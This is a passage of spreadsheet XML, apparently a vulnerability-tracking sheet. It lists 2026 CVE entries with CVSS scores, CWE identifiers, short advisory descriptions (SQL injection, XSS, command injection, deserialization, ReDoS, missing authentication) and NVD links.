      <c r="D112" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="inlineStr"/>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>Contributor SQL Injection in Easy Pricing Tables &lt;= 4.1.2 versions.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94115</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94177</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="inlineStr"/>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr"/>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated SQL Injection in GamiPress &lt;= 8.0.2 versions.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94177</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97287</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr"/>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S114" s="5" t="inlineStr">
        <is>
          <t>Contributor SQL Injection in Event Tickets &lt;= 5.29.5 versions.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97287</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97293</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr"/>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>Contributor SQL Injection in Media LIbrary Assistant &lt;= 3.41 versions.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97293</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76146</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>vuln@krcert.or.kr</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr"/>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>An OS command injection vulnerability in Genian SSL PNS allows an attacker who knows only the client access ID, without the password, to execute arbitrary commands remotely</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76146</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103237</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-639</t>
        </is>
      </c>
      <c r="S117" s="5" t="inlineStr">
        <is>
          <t>MISP contains an improper input validation vulnerability in its ORM save path. When a user submits data through various endpoints (attribute add/edit, event edit, free-text import, sighting capture, shadow attribute proposal, event report creation, object reference add, user admin edit), the application sanitizes the flat record by stripping the primary key and pinning the event_id or object_id to the caller's context. However, the underlying ORM's set() method gives priority to a nested key whose name matches the model alias and discards the outer scalar fields.
An authenticated user with basic write permissions can exploit this by embedding a nested block under the model alias key inside their request. The sanitization logic (id removal, event_id pinning) is applied to the outer record, but the ORM binds to the inner record instead, which carries an attacker-chosen id and event_id. This allows the attacker to overwrite, re-parent, or soft-delete rows belonging to other organizations or events they have no read access to.
Impact:
- Cross-tenant data integrity compromise (attribute values rewritten, objects re-parented to attacker events, rows soft-deleted)
- Affects multiple entity types: Attribute, Object, EventReport, Sighting, AttributeTag, ShadowAttribute
- Requires only a low-privilege authenticated account with perm_add
Affected versions: &lt;2.5.48</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103237</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103321</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-79</t>
        </is>
      </c>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>MISP contains a stored cross-site script (XSS) vulnerability in the event graph preview feature.
The event graph preview image field was accepted and stored without server-side validation. On the client side, the stored value was rendered into an HTML img element's src attribute via string concatenation, allowing a crafted value to break out of the attribute context and inject arbitrary script.
Preconditions:
- An authenticated MISP user with the ability to create or modify an event graph entry.
- A second user (the victim) who views the event graph and triggers the preview popover.
Impact:
- Execution of arbitrary JavaScript in the victim's browser within the MISP application context.
- Potential theft of session tokens, cookies, or sensitive data accessible to the victim's browser.
- Potential for performing actions on behalf of the victim within the MISP application.
Affected: MISP versions prior to the fix (commit applied after v2.5.48).</t>
        </is>
      </c>
      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103321</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46711</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>Soft Machine is a Virtual Machine–based agentic development environment / Cloud OS. In versions 0.2.247 and prior, the workspace HTTP service that listens on 0.0.0.0:8080 inside each sm-ws-* Fly Machine exposes endpoints (/health, /file/&lt;path&gt;, /archive/&lt;dir&gt;) without any authentication or origin check. Any host that can reach TCP/8080 on a workspace can read arbitrary files under that workspace's /workspace root and download whole project trees as tar archives. Because every workspace shares the same Fly private 6PN and resolves all peer addresses via the unauthenticated _instances.internal TXT record, every other sm-ws-* machine on the same Fly app/org is a reachable, unauthenticated attacker — the trust boundary (workspace owner ↔ everyone-else) is missing. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46711</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100273</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 authorisation bypass in the scripts debugger allowed arbitrary code execution</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100273</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102984</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="inlineStr"/>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr">
        <is>
          <t>npm:@astrojs/node</t>
        </is>
      </c>
      <c r="M121" s="5" t="inlineStr">
        <is>
          <t>11.1.3</t>
        </is>
      </c>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>Astro is a web framework for content-driven websites. Prior to 11.1.3, the @astrojs/node adapter builds a request URL from the Host header, and a malformed port can make that URL invalid. The recovery path reuses the same malformed host and throws an uncaught TypeError: Invalid URL before routing begins. In the default standalone configuration, the request returns an HTTP 500 response and the server continues running, but when staticHeaders is enabled the synchronous handler does not catch the exception and the Node process terminates. Proxies and CDNs that reject malformed Host headers prevent this path from reaching the origin. The issue affects availability only and does not expose data or permit code execution. This issue is fixed in version 11.1.3.</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102984</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102990</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr">
        <is>
          <t>node.js, express</t>
        </is>
      </c>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>basic-ftp is an FTP client for Node.js. Prior to 6.2.1, Client.list() can be forced by a malicious or compromised FTP server to spend quadratic CPU time parsing a directory listing because the RE_LINE expression in src/parseListUnix.ts backtracks across adjacent variable-length owner and group fields when a long Unix-style line has a valid prefix but cannot satisfy the later size and date fields. parseList() selects a parser from the last nonblank line and then applies it to every line, so a normal final line can select the Unix parser while an earlier crafted line blocks the Node.js event loop and freezes the process. This issue is fixed in version 6.2.1.</t>
        </is>
      </c>
      <c r="T122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102990</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93621</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr"/>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated SQL Injection in WP Data Access &lt;= 5.5.84 versions.</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93621</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96817</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="inlineStr"/>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr"/>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>Subscriber Broken Access Control in MakeCommerce for WooCommerce &lt;= 4.1.0 versions.</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96817</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100255</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="inlineStr"/>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr"/>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>CWE-1289</t>
        </is>
      </c>
      <c r="S125" s="5" t="inlineStr">
        <is>
          <t>In JetBrains TeamCity before 2026.2, 
2026.1.4, 
2025.11.8 administrator account takeover was possible via password reset</t>
        </is>
      </c>
      <c r="T125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100255</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102101</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S126" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to Deserialization of Untrusted Data. A deserialization weakness in Kiteworks Core could, under certain conditions, allow crafted data to be deserialized unsafely, potentially resulting in remote code execution on the appliance. Exploitation depends on an attacker first being able to influence the affected data, so this issue is not exploitable on its own.</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102101</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102126</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr"/>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S127" s="5" t="inlineStr">
        <is>
          <t>A stored cross-site scripting (XSS) weakness in Kiteworks Core could allow an administrator holding only a single, narrowly scoped delegated permission to store crafted content that later executes arbitrary JavaScript in the authenticated session of a System Administrator who views the affected page. This could have permitted the lower-privileged administrator to escalate to full administrative control of the tenant, including the creation of a new administrative account.</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102126</t>
        </is>
      </c>
    </row>
    <row r="128">
